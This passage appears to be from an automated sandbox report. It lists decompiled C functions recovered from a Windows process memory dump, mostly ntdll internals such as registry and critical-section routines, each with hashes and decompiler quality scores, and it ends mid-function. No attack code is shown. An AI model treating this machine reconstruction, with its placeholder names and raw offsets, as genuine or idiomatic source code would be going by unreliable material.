                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: beec4d668f6121631b1c519e565e53bda62d9db588859aad31bc93d1c48259d9
                                          • Instruction ID: 2286061e1d5f07e8a9a761a7e90f4c8915a94a9eab28eed739516515c3bc2977
                                          • Opcode Fuzzy Hash: beec4d668f6121631b1c519e565e53bda62d9db588859aad31bc93d1c48259d9
                                          • Instruction Fuzzy Hash: 3A4122F2D0052CABEF21DA50CC85FAEB77CAB44714F0045A5EA09AB241DB749F889F95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E00FE05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				char _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				void* __ebx;
                                          				void* _t35;
                                          				signed int _t42;
                                          				char* _t48;
                                          				signed int _t59;
                                          				signed char _t61;
                                          				signed int* _t79;
                                          				intOrPtr _t88;
                                          
                                          				_v28 = __edx;
                                          				_t79 = __ecx;
                                          				if(E00FE07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                          					L13:
                                          					_t35 = 0;
                                          					L14:
                                          					return _t35;
                                          				}
                                          				_t61 = __ecx[1];
                                          				_t59 = __ecx[0xf];
                                          				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                          				_v36 = _a8 << 0xc;
                                          				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                          				asm("sbb esi, esi");
                                          				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                          				if(_t42 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t59);
                                          					_push(0xffffffff);
                                          					if(E00F59730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                          						_push(_t61);
                                          						E00FDA80D(_t59, 1, _v20, 0);
                                          						_t88 = 4;
                                          					}
                                          				}
                                          				_t35 = E00FDA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                          				if(_t35 < 0) {
                                          					goto L14;
                                          				}
                                          				E00FE1293(_t79, _v40, E00FE07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                          				if(E00F37D50() == 0) {
                                          					_t48 = 0x7ffe0380;
                                          				} else {
                                          					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				}
                                          				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          					E00FD138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                          				}
                                          				goto L13;
                                          			}


















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: 82d02b226e66b9f0d5bc39f79116577ea02a6c8a63a02043184428c06cd3edeb
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: E83113326043856BE720DE26CC45F9777D9BB84764F044229FA449B2C0DBB0ED54DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F53D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				signed short** _t33;
                                          				short* _t38;
                                          				intOrPtr* _t39;
                                          				intOrPtr* _t41;
                                          				signed short _t43;
                                          				intOrPtr* _t47;
                                          				intOrPtr* _t53;
                                          				signed short _t57;
                                          				intOrPtr _t58;
                                          				signed short _t60;
                                          				signed short* _t61;
                                          
                                          				_t47 = __ecx;
                                          				_t61 = __edx;
                                          				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                          				if(_t60 > 0xfffe) {
                                          					L22:
                                          					return 0xc0000106;
                                          				}
                                          				if(__edx != 0) {
                                          					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                          						L5:
                                          						E00F27B60(0, _t61, 0xef11c4);
                                          						_v12 =  *_t47;
                                          						_v12 = _v12 + 0xfff8;
                                          						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                          						E00F27B60(0xfff8, _t61,  &_v12);
                                          						_t33 = _a8;
                                          						if(_t33 != 0) {
                                          							 *_t33 = _t61;
                                          						}
                                          						_t12 =  &(_t61[2]); // 0x5264616f
                                          						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                          						_t53 = _a12;
                                          						if(_t53 != 0) {
                                          							_t57 = _t61[2];
                                          							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                          							while(_t38 >= _t57) {
                                          								if( *_t38 == 0x5c) {
                                          									_t41 = _t38 + 2;
                                          									if(_t41 == 0) {
                                          										break;
                                          									}
                                          									_t58 = 0;
                                          									if( *_t41 == 0) {
                                          										L19:
                                          										 *_t53 = _t58;
                                          										goto L7;
                                          									}
                                          									 *_t53 = _t41;
                                          									goto L7;
                                          								}
                                          								_t38 = _t38 - 2;
                                          							}
                                          							_t58 = 0;
                                          							goto L19;
                                          						} else {
                                          							L7:
                                          							_t39 = _a16;
                                          							if(_t39 != 0) {
                                          								 *_t39 = 0;
                                          								 *((intOrPtr*)(_t39 + 4)) = 0;
                                          								 *((intOrPtr*)(_t39 + 8)) = 0;
                                          								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                          							}
                                          							return 0;
                                          						}
                                          					}
                                          					_t61 = _a4;
                                          					if(_t61 != 0) {
                                          						L3:
                                          						_t43 = L00F34620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                          						_t61[2] = _t43;
                                          						if(_t43 == 0) {
                                          							return 0xc0000017;
                                          						}
                                          						_t61[1] = _t60;
                                          						 *_t61 = 0;
                                          						goto L5;
                                          					}
                                          					goto L22;
                                          				}
                                          				_t61 = _a4;
                                          				if(_t61 == 0) {
                                          					return 0xc000000d;
                                          				}
                                          				goto L3;
                                          			}

















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RegLoadRegistryInfo
                                          • API String ID: 0-282410176
                                          • Opcode ID: 137ed31be4e5b37d58c4257f18c8595228565a2eb238abab5a56c0548c2c2e82
                                          • Instruction ID: fc69e3c0ea3b4196ca8d1a3ae6f082c9f72d5e48440e1f0ee55a7b2b6e8ec8dd
                                          • Opcode Fuzzy Hash: 137ed31be4e5b37d58c4257f18c8595228565a2eb238abab5a56c0548c2c2e82
                                          • Instruction Fuzzy Hash: 05310032A00628DBC7249F2DC842A7BBBF0EF857A1B15806AEA45CB350E730DD44E790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E00F93884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _v16;
                                          				char* _v20;
                                          				short _v22;
                                          				char _v24;
                                          				intOrPtr _t38;
                                          				short _t40;
                                          				short _t41;
                                          				void* _t44;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          
                                          				_v16 = __edx;
                                          				_t40 = 0x14;
                                          				_v24 = _t40;
                                          				_t41 = 0x16;
                                          				_v22 = _t41;
                                          				_t38 = 0;
                                          				_v12 = __ecx;
                                          				_push( &_v8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(2);
                                          				_t43 =  &_v24;
                                          				_v20 = L"BinaryName";
                                          				_push( &_v24);
                                          				_push(__ecx);
                                          				_t47 = 0;
                                          				_t48 = E00F59650();
                                          				if(_t48 >= 0) {
                                          					_t48 = 0xc000090b;
                                          				}
                                          				if(_t48 != 0xc0000023) {
                                          					_t44 = 0;
                                          					L13:
                                          					if(_t48 < 0) {
                                          						L16:
                                          						if(_t47 != 0) {
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                          						}
                                          						L18:
                                          						return _t48;
                                          					}
                                          					 *_v16 = _t38;
                                          					 *_a4 = _t47;
                                          					goto L18;
                                          				}
                                          				_t47 = L00F34620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                          				if(_t47 != 0) {
                                          					_push( &_v8);
                                          					_push(_v8);
                                          					_push(_t47);
                                          					_push(2);
                                          					_push( &_v24);
                                          					_push(_v12);
                                          					_t48 = E00F59650();
                                          					if(_t48 < 0) {
                                          						_t44 = 0;
                                          						goto L16;
                                          					}
                                          					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                          						_t48 = 0xc000090b;
                                          					}
                                          					_t44 = 0;
                                          					if(_t48 < 0) {
                                          						goto L16;
                                          					} else {
                                          						_t17 = _t47 + 0xc; // 0xc
                                          						_t38 = _t17;
                                          						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                          							_t48 = 0xc000090b;
                                          						}
                                          						goto L13;
                                          					}
                                          				}
                                          				_t48 = _t48 + 0xfffffff4;
                                          				goto L18;
                                          			}
















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: cb989e23d0c81fe588f546e689e0f2217415e8d5827a7bb79e01744e4c5cae73
                                          • Instruction ID: bd83452e3b2f531e2fd87419231339ff807ba1b4ed9784071f65c20d50264423
                                          • Opcode Fuzzy Hash: cb989e23d0c81fe588f546e689e0f2217415e8d5827a7bb79e01744e4c5cae73
                                          • Instruction Fuzzy Hash: 75310372D00529AFEF15DB58C946F7BB775EB80B20F114129E904A7280D770AF04E7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 33%
                                          			E00F4D294(signed short* __ecx, char __edx, void* __eflags) {
                                          				signed int _v8;
                                          				char _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				intOrPtr _v64;
                                          				char* _v68;
                                          				intOrPtr _v72;
                                          				char _v76;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				char _v92;
                                          				intOrPtr _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				char _v105;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t35;
                                          				char _t38;
                                          				signed int _t40;
                                          				signed int _t44;
                                          				signed int _t52;
                                          				void* _t53;
                                          				signed char _t55;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t64;
                                          				signed int _t65;
                                          				signed int _t66;
                                          
                                          				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                          				_v8 =  *0x100d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                          				_v105 = __edx;
                                          				_push( &_v92);
                                          				_t52 = 0;
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v104);
                                          				_push(0);
                                          				_t59 = __ecx;
                                          				_t55 = 2;
                                          				if(E00F34120(_t55, __ecx) < 0) {
                                          					_t35 = 0;
                                          					L8:
                                          					_pop(_t61);
                                          					_pop(_t64);
                                          					_pop(_t53);
                                          					return E00F5B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                          				}
                                          				_v96 = _v100;
                                          				_t38 = _v92;
                                          				if(_t38 != 0) {
                                          					_v104 = _t38;
                                          					_v100 = _v88;
                                          					_t40 = _v84;
                                          				} else {
                                          					_t40 = 0;
                                          				}
                                          				_v72 = _t40;
                                          				_v68 =  &_v104;
                                          				_push( &_v52);
                                          				_v76 = 0x18;
                                          				_push( &_v76);
                                          				_v64 = 0x40;
                                          				_v60 = _t52;
                                          				_v56 = _t52;
                                          				_t44 = E00F598D0();
                                          				_t62 = _v88;
                                          				_t65 = _t44;
                                          				if(_t62 != 0) {
                                          					asm("lock xadd [edi], eax");
                                          					if((_t44 | 0xffffffff) != 0) {
                                          						goto L4;
                                          					}
                                          					_push( *((intOrPtr*)(_t62 + 4)));
                                          					E00F595D0();
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                          					goto L4;
                                          				} else {
                                          					L4:
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                          					if(_t65 >= 0) {
                                          						_t52 = 1;
                                          					} else {
                                          						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                          							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                          						}
                                          					}
                                          					_t35 = _t52;
                                          					goto L8;
                                          				}
                                          			}


































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: febb75218778b5bc4ed776d69883a4eef22d0c54308e5935d698f9b08028a4f4
                                          • Instruction ID: c8e59de5dbe59aa3aa0e0cae2ed00b00fc8aad45acc85e35ba53d7f0006b7bb4
                                          • Opcode Fuzzy Hash: febb75218778b5bc4ed776d69883a4eef22d0c54308e5935d698f9b08028a4f4
                                          • Instruction Fuzzy Hash: A1318FB25083059FD321DF28C981A6BBFE8EB85764F50092EF99483250D639DD08EB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E00F21B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                          				intOrPtr _v8;
                                          				char _v16;
                                          				intOrPtr* _t26;
                                          				intOrPtr _t29;
                                          				void* _t30;
                                          				signed int _t31;
                                          
                                          				_t27 = __ecx;
                                          				_t29 = __edx;
                                          				_t31 = 0;
                                          				_v8 = __edx;
                                          				if(__edx == 0) {
                                          					L18:
                                          					_t30 = 0xc000000d;
                                          					goto L12;
                                          				} else {
                                          					_t26 = _a4;
                                          					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                          						goto L18;
                                          					} else {
                                          						E00F5BB40(__ecx,  &_v16, __ecx);
                                          						_push(_t26);
                                          						_push(0);
                                          						_push(0);
                                          						_push(_t29);
                                          						_push( &_v16);
                                          						_t30 = E00F5A9B0();
                                          						if(_t30 >= 0) {
                                          							_t19 =  *_t26;
                                          							if( *_t26 != 0) {
                                          								goto L7;
                                          							} else {
                                          								 *_a8 =  *_a8 & 0;
                                          							}
                                          						} else {
                                          							if(_t30 != 0xc0000023) {
                                          								L9:
                                          								_push(_t26);
                                          								_push( *_t26);
                                          								_push(_t31);
                                          								_push(_v8);
                                          								_push( &_v16);
                                          								_t30 = E00F5A9B0();
                                          								if(_t30 < 0) {
                                          									L12:
                                          									if(_t31 != 0) {
                                          										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                          									}
                                          								} else {
                                          									 *_a8 = _t31;
                                          								}
                                          							} else {
                                          								_t19 =  *_t26;
                                          								if( *_t26 == 0) {
                                          									_t31 = 0;
                                          								} else {
                                          									L7:
                                          									_t31 = L00F34620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                          								}
                                          								if(_t31 == 0) {
                                          									_t30 = 0xc0000017;
                                          								} else {
                                          									goto L9;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t30;
                                          			}










                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: 0af95d40507764debde661119b3f92cfe48350bb1b3f9b015bc2cd8b1a5ae24e
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: 5F21D37B980638ABCB21AA55A840F9FB7A9BB91760F254426FD048B200D634DC00B7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F3F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                          				intOrPtr _t13;
                                          				intOrPtr _t14;
                                          				signed int _t16;
                                          				signed char _t17;
                                          				intOrPtr _t19;
                                          				intOrPtr _t21;
                                          				intOrPtr _t23;
                                          				intOrPtr* _t25;
                                          
                                          				_t25 = _a8;
                                          				_t17 = __ecx;
                                          				if(_t25 == 0) {
                                          					_t19 = 0xc00000f2;
                                          					L8:
                                          					return _t19;
                                          				}
                                          				if((__ecx & 0xfffffffe) != 0) {
                                          					_t19 = 0xc00000ef;
                                          					goto L8;
                                          				}
                                          				_t19 = 0;
                                          				 *_t25 = 0;
                                          				_t21 = 0;
                                          				_t23 = "Actx ";
                                          				if(__edx != 0) {
                                          					if(__edx == 0xfffffffc) {
                                          						L21:
                                          						_t21 = 0x200;
                                          						L5:
                                          						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                          						 *_t25 = _t13;
                                          						L6:
                                          						if(_t13 == 0) {
                                          							if((_t17 & 0x00000001) != 0) {
                                          								 *_t25 = _t23;
                                          							}
                                          						}
                                          						L7:
                                          						goto L8;
                                          					}
                                          					if(__edx == 0xfffffffd) {
                                          						 *_t25 = _t23;
                                          						_t13 = _t23;
                                          						goto L6;
                                          					}
                                          					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                          					 *_t25 = _t13;
                                          					L14:
                                          					if(_t21 == 0) {
                                          						goto L6;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t14 = _a4;
                                          				if(_t14 != 0) {
                                          					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                          					if(_t16 <= 1) {
                                          						_t21 = 0x1f8;
                                          						_t13 = 0;
                                          						goto L14;
                                          					}
                                          					if(_t16 == 2) {
                                          						goto L21;
                                          					}
                                          					if(_t16 != 4) {
                                          						_t19 = 0xc00000f0;
                                          						goto L7;
                                          					}
                                          					_t13 = 0;
                                          					goto L6;
                                          				} else {
                                          					_t21 = 0x1f8;
                                          					goto L5;
                                          				}
                                          			}












                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 52034130f0eee577f7ef401c4e1908ede08379853ecfea067a2bfc82ad8f9903
                                          • Instruction ID: 9b4be9fbaff58bb53df822330593c384c27170307802ae2dc84de967a9361edb
                                          • Opcode Fuzzy Hash: 52034130f0eee577f7ef401c4e1908ede08379853ecfea067a2bfc82ad8f9903
                                          • Instruction Fuzzy Hash: 6B11C136F087028BEF244E1D8890B767296EB96774F34453AE866CB391EB70DC49B340
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E00FC8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t35;
                                          				void* _t41;
                                          
                                          				_t40 = __esi;
                                          				_t39 = __edi;
                                          				_t38 = __edx;
                                          				_t35 = __ecx;
                                          				_t34 = __ebx;
                                          				_push(0x74);
                                          				_push(0xff0d50);
                                          				E00F6D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                          				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                          					E00FA5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                          					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                          						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                          						asm("int3");
                                          						 *(_t41 - 4) = 0xfffffffe;
                                          					}
                                          				}
                                          				 *(_t41 - 4) = 1;
                                          				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                          				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                          				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                          				 *((intOrPtr*)(_t41 - 0x64)) = L00F6DEF0;
                                          				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                          				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                          				_push(_t41 - 0x70);
                                          				L00F6DEF0(1, _t38);
                                          				 *(_t41 - 4) = 0xfffffffe;
                                          				return E00F6D130(_t34, _t39, _t40);
                                          			}






                                          Strings
                                          • Critical error detected %lx, xrefs: 00FC8E21
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: df62150d09c44e1436fe9581654e7e5ec5e6f8ccb2abd42c899fd1e0a8ff5a1d
                                          • Instruction ID: 2e96797d1375fd6be4e8857e06ea6c2703109438449271233b686dc97212f72b
                                          • Opcode Fuzzy Hash: df62150d09c44e1436fe9581654e7e5ec5e6f8ccb2abd42c899fd1e0a8ff5a1d
                                          • Instruction Fuzzy Hash: 77116D71E14349DBDF24CFE58A06BECBBB0BB04755F20425DE5296B292C7784A02EF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00FAFF60
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 0-1911121157
                                          • Opcode ID: 7ddb87f125fc805cf1285f42d8434f2753fec2859184711e91c540e1082ff91f
                                          • Instruction ID: dc1c8a6720d53ab94e999ce609255557e83dc572bd75d319988e6821ed9c9255
                                          • Opcode Fuzzy Hash: 7ddb87f125fc805cf1285f42d8434f2753fec2859184711e91c540e1082ff91f
                                          • Instruction Fuzzy Hash: AF1104B1A10148EFDF22DB90CD49F98B7B1FF09714F148154F5046B2A2C77D9944EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E00FAFE87(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				short _v54;
                                          				char _v60;
                                          				signed char* _t21;
                                          				void* _t27;
                                          				void* _t32;
                                          				void* _t33;
                                          				void* _t34;
                                          				signed int _t35;
                                          
                                          				_v8 =  *0x100d360 ^ _t35;
                                          				_v16 = __ecx;
                                          				_v54 = 0x1722;
                                          				_v24 =  *(__ecx + 0x14) & "iRegLoadRegistryInfo";
                                          				_v28 =  *((intOrPtr*)(__ecx + 4));
                                          				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                          				if(E00F37D50() == 0) {
                                          					_t21 = 0x7ffe0382;
                                          				} else {
                                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                          				}
                                          				_push( &_v60);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				return E00F5B640(E00F59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
                                          			}

















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: iRegLoadRegistryInfo
                                          • API String ID: 0-313553867
                                          • Opcode ID: 16b63a76eb4745faa3aa5bd6dcb1e8289196e801f6e164194cb7b110f33d6a9d
                                          • Instruction ID: 2d50aa4071f4ddab9f1b30430afb88cfb3f083b6db4ce5182701647e74f64781
                                          • Opcode Fuzzy Hash: 16b63a76eb4745faa3aa5bd6dcb1e8289196e801f6e164194cb7b110f33d6a9d
                                          • Instruction Fuzzy Hash: A4016270A0420CEFCB14DFA8D942A6EB7F4EF04310F1041A9B904DB392D639D905DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E00FE5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int _t296;
                                          				signed char _t298;
                                          				signed int _t301;
                                          				signed int _t306;
                                          				signed int _t310;
                                          				signed char _t311;
                                          				intOrPtr _t312;
                                          				signed int _t313;
                                          				void* _t327;
                                          				signed int _t328;
                                          				intOrPtr _t329;
                                          				intOrPtr _t333;
                                          				signed char _t334;
                                          				signed int _t336;
                                          				void* _t339;
                                          				signed int _t340;
                                          				signed int _t356;
                                          				signed int _t362;
                                          				short _t367;
                                          				short _t368;
                                          				short _t373;
                                          				signed int _t380;
                                          				void* _t382;
                                          				short _t385;
                                          				signed short _t392;
                                          				signed char _t393;
                                          				signed int _t395;
                                          				signed char _t397;
                                          				signed int _t398;
                                          				signed short _t402;
                                          				void* _t406;
                                          				signed int _t412;
                                          				signed char _t414;
                                          				signed short _t416;
                                          				signed int _t421;
                                          				signed char _t427;
                                          				intOrPtr _t434;
                                          				signed char _t435;
                                          				signed int _t436;
                                          				signed int _t442;
                                          				signed int _t446;
                                          				signed int _t447;
                                          				signed int _t451;
                                          				signed int _t453;
                                          				signed int _t454;
                                          				signed int _t455;
                                          				intOrPtr _t456;
                                          				intOrPtr* _t457;
                                          				short _t458;
                                          				signed short _t462;
                                          				signed int _t469;
                                          				intOrPtr* _t474;
                                          				signed int _t475;
                                          				signed int _t479;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				short _t485;
                                          				signed int _t491;
                                          				signed int* _t494;
                                          				signed int _t498;
                                          				signed int _t505;
                                          				intOrPtr _t506;
                                          				signed short _t508;
                                          				signed int _t511;
                                          				void* _t517;
                                          				signed int _t519;
                                          				signed int _t522;
                                          				void* _t523;
                                          				signed int _t524;
                                          				void* _t528;
                                          				signed int _t529;
                                          
                                          				_push(0xd4);
                                          				_push(0xff1178);
                                          				E00F6D0E8(__ebx, __edi, __esi);
                                          				_t494 = __edx;
                                          				 *(_t528 - 0xcc) = __edx;
                                          				_t511 = __ecx;
                                          				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                          				 *(_t528 - 0xbc) = __ecx;
                                          				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                          				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                          				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                          				_t427 = 0;
                                          				 *(_t528 - 0x74) = 0;
                                          				 *(_t528 - 0x9c) = 0;
                                          				 *(_t528 - 0x84) = 0;
                                          				 *(_t528 - 0xac) = 0;
                                          				 *(_t528 - 0x88) = 0;
                                          				 *(_t528 - 0xa8) = 0;
                                          				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                          				if( *(_t528 + 0x1c) <= 0x80) {
                                          					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                          					if(__eflags != 0) {
                                          						_t421 = E00FE4C56(0, __edx, __ecx, __eflags);
                                          						__eflags = _t421;
                                          						if(_t421 != 0) {
                                          							 *((intOrPtr*)(_t528 - 4)) = 0;
                                          							E00F5D000(0x410);
                                          							 *(_t528 - 0x18) = _t529;
                                          							 *(_t528 - 0x9c) = _t529;
                                          							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                          							E00FE5542(_t528 - 0x9c, _t528 - 0x84);
                                          						}
                                          					}
                                          					_t435 = _t427;
                                          					 *(_t528 - 0xd0) = _t435;
                                          					_t474 = _t511 + 0x65;
                                          					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                          					_t511 = 0x18;
                                          					while(1) {
                                          						 *(_t528 - 0xa0) = _t427;
                                          						 *(_t528 - 0xbc) = _t427;
                                          						 *(_t528 - 0x80) = _t427;
                                          						 *(_t528 - 0x78) = 0x50;
                                          						 *(_t528 - 0x79) = _t427;
                                          						 *(_t528 - 0x7a) = _t427;
                                          						 *(_t528 - 0x8c) = _t427;
                                          						 *(_t528 - 0x98) = _t427;
                                          						 *(_t528 - 0x90) = _t427;
                                          						 *(_t528 - 0xb0) = _t427;
                                          						 *(_t528 - 0xb8) = _t427;
                                          						_t296 = 1 << _t435;
                                          						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                          						__eflags = _t436 & _t296;
                                          						if((_t436 & _t296) != 0) {
                                          							goto L92;
                                          						}
